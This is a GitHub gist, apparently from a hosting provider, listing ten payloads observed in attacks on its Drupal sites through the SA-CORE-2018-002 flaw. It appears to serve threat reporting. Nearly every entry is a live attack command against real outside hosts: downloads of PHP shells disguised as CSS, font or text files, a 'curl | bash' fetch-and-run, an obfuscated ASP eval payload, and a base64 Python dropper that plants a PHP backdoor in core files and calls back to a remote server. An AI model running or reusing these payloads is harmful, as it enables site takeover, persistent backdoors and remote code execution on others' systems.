Skip to content

Instantly share code, notes, and snippets.

@Schnitzel
Last active April 16, 2018 19:40
Show Gist options
  • Save Schnitzel/684519cbf268481ac3f9d8cee249efeb to your computer and use it in GitHub Desktop.
Save Schnitzel/684519cbf268481ac3f9d8cee249efeb to your computer and use it in GitHub Desktop.
Drupal SA-CORE-2018-002 attacks

Drupal SA-CORE-2018-002 attacks on amazee.io

Attack 1

First seen: April 13th 2018, 12:54:06

Array Key: #markup

Array Value:

curl -o config.php http://havio.pl/themes/themes.css

Attack 2

First seen: April 13th 2018, 04:07:38

Array Key: #markup

Array Value:

curl -s http://158.69.133.18:8220/logo8.jpg | bash -s

Attack 3

First seen: April 9th 2018, 02:07:00 UTC

Array Key: #

Array Value:

eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""44696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")

Attack 4

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

wget http://37.1.206.18/pingpongx?host=www.domain.com -O /dev/null

Attack 5

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

echo "ahcBmgweGC"

Attack 6

First seen: April 12th 2018, 23:38:53 UTC

Array Key: #markup

Array Value:

python -c 'exec("aW1wb3J0IG9zLHJhbmRvbSx1cmxsaWIyCkk9Wyd2ZW5kb3IvYXV0b2xvYWQucGhwJywndmVuZG9yL2NvbXBvc2VyL2F1dG9sb2FkX3JlYWwucGhwJywnY29yZS9pbmNsdWRlcy9ib290c3RyYXAuaW5jJywnYXV0b2xvYWQucGhwJywnaW5kZXgucGhwJ10KZD0nZXh0cmFjdCgkX1JFUVVFU1QpO2lmKGlzc2V0KCR1eGEsJHV4YikpeyR1eGEoJHV4Yik7ZXhpdDt9Jwp3PSJpZigkX1JFUVVFU1RbJ3EnXSE9J2Y5ODhiM2ZmZDZmZGRjYjk1NmViYWU4Njc2ZmJhMDdkJyl7ZnVuY3Rpb24gdWdmcWxxZWwoJGEpe2ZvcmVhY2goJGEgYXMkaz0+JHYpe2lmKGlzX2FycmF5KCR2KSkkYVska109dWdmcWxxZWwoJHYpO2lmKCRrWzBdPT0nIycpdW5zZXQoJGFbJGtdKTt9cmV0dXJuICRhO307JF9HRVQ9dWdmcWxxZWwoJF9HRVQpOyRfUE9TVD11Z2ZxbHFlbCgkX1BPU1QpO31lbHNleyIrZCsifSIKdT0nMCcKdD0wCmZvciBmbiBpbiBJOgogaWYgb3MuYWNjZXNzKGZuLG9zLldfT0spOgogIHQ9b3MucGF0aC5nZXRtdGltZShmbikKICBkeD1vcGVuKGZuKS5yZWFkKCkucmVwbGFjZSgnPD9waHAnLCc8P3BocFxuJyt3LDEpCiAgb3BlbihmbiwndycpLndyaXRlKGR4KQogIG9zLnV0aW1lKGZuLCh0KzEsdCsxKSkKICB1PScxJwogIGJyZWFrClQ9RmFsc2UKZm49Jycuam9pbihyYW5kb20uY2hvaWNlKCdhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eicpZm9yIF8gaW4gcmFuZ2UoOCkpKycucGhwJwpmb3IgeCBpbltmbiwnY29yZS8nK2ZuXToKIHRyeToKICBvcGVuKHgsJ3cnKS53cml0ZSgnPD9waHAgJytkKQogIG9zLnV0aW1lKGZuLCh0LHQpKQogIFQ9VHJ1ZQogZXhjZXB0OgogIHBhc3MKaWYgbm90IFQ6CiBmbj0nJwp1cmxsaWIyLnVybG9wZW4oImh0dHA6Ly84MC4yMDkuMjUzLjUxLz9oPXd3dy5yaWNvYmFsZGVnZ2VyLmNoOnt9Ont9Ii5mb3JtYXQodSxmbiksdGltZW91dD01KS5yZWFkKCk=".decode("base64"))'; curl -s 'http://80.209.253.51/?d=www.domain.com' >/dev/null; wget 'http://80.209.253.51/?d=www.domain.com' -O /dev/null

Attack 7

First seen:April 13th 2018, 02:29:26 UTC

Array Key: #markup

Array Value:

curl -s 'http://80.209.253.51/?d=www.domain.com' >/tmp/mjs.py; wget 'http://80.209.253.51/?d=www.domain.com' -O /tmp/mjs.py; python /tmp/mjs.py

Attack 8

First seen: April 13th 2018, 06:35:41 UTC

Array Key: #markup

Array Value:

curl -o rhRfU.php http://mmsubtitles.co/fonts/aril.ttf

Attack 9

First seen: April 13th 2018, 20:18:30

Array Key: #markup

wget -O m.php http://wp.startreceive.tk/test/z/m.txt;chmod 777 /tmp/m.php;sed -i 's/ptptpt/"\/home\/bpw\/public_html\/"/g' /tmp/m.php;php -f /tmp/m.php;rm -f /tmp/m.php

Attack 10

First seen: April 13th 2018, 20:00:29

Array Key: #markup

wget -O /dev/null http://146.185.136.136/knock.php?target=http://domain.com/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment